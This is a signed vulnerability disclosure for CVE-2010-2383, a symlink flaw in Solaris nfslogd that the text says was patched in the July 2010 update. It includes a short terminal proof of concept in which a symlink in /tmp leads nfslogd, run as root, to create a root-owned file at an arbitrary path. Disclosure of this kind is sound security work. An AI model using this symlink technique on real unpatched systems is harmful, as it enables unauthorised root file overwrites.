-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Below is the full disclosure information for CVE-2010-2383.  It was
reported to security-alert@sun.com on 29 December, 2009 and assigned Sun
bug 6913655.

This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).

- ------
This one is with nfslogd which allows an unprivileged
user to create/overwrite a file as root:

Don't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx   1 nobody   nobody         9 Dec 29 21:24 /tmp/.nfslogd.pid
- -> /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
- -rw-------   1 root     root           4 Dec 29 21:25 /etc/oops

- ------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTEUK12KGA6cQSpZSAQKDmgf+Khyu8Mq5rk4wKHUGQm4NCZOvC75ilW2e
Nr9dw/YEEDIZZkaGHRRtPD9pBgnrdCbP/Pvt6wSYyr+JOLYCO1BGGFA36eenTgzI
lbpDuFDgpVO4+DPb5TslS1MYkLYYFh+S9l0zzdYGVvAbURabp35VW852O2SHY7Pg
ZsUjRUrbSMIPUcVq024CLtro2VCJPiZ9o691ChpNlkdCTdtS6PUCllwQazz/2UFO
Gf21llPnO7kkQP7zbjbTITx9cjx6hYOxKbfLtrupxjtnXHRIjts0ToFxUYnT5eWD
3I/1m8/VjnqQSIY7nytcIj+nZG1z7e/zhOmdE54wRcpQzONYngNcWA==
=ojGd
-----END PGP SIGNATURE-----